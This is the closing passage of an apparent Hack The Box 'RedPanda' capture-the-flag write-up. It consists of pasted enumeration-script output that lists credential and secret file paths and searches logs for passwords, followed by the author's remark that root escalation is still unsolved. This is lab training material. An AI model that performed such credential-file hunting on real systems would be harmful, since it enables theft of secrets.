/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh /usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c /usr/share/man/man1/git-credential-cache--daemon.1.gz /usr/share/man/man1/git-credential-cache.1.gz /usr/share/man/man1/git-credential-store.1.gz /usr/share/man/man1/git-credential.1.gz#)There are more creds/passwds files in the previous parent folder/usr/share/man/man7/gitcredentials.7.gz /usr/share/man/man8/systemd-ask-password-console.path.8.gz /usr/share/man/man8/systemd-ask-password-console.service.8.gz /usr/share/man/man8/systemd-ask-password-wall.path.8.gz /usr/share/man/man8/systemd-ask-password-wall.service.8.gz#)There are more creds/passwds files in the previous parent folder/usr/share/pam/common-password.md5sums /var/cache/debconf/passwords.dat 
/var/lib/cloud/instances/f97e41c8-944d-4b3f-a3a8-8db23afb94f3/sem/config_set_passwords /var/lib/fwupd/pki/secret.key /var/lib/pam/password╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs╔══════════╣ Searching passwords inside logs (limit 70) Binary file /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal matches [ 3.636139] systemd[1]: Started Forward Password Requests to Wall Directory Watch. [ 3.808595] systemd[1]: Started Forward Password Requests to Wall Directory Watch.-
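I have not found the correct privilege escalation method yet, so for now I am publishing this as an SSTI injection write-up. I will update the article once I find a method.

Anyone interested can go to Hack The Box: Hacking Training For The Best | Individuals & Companies and try to escalate to root. The machine this time is named RedPanda.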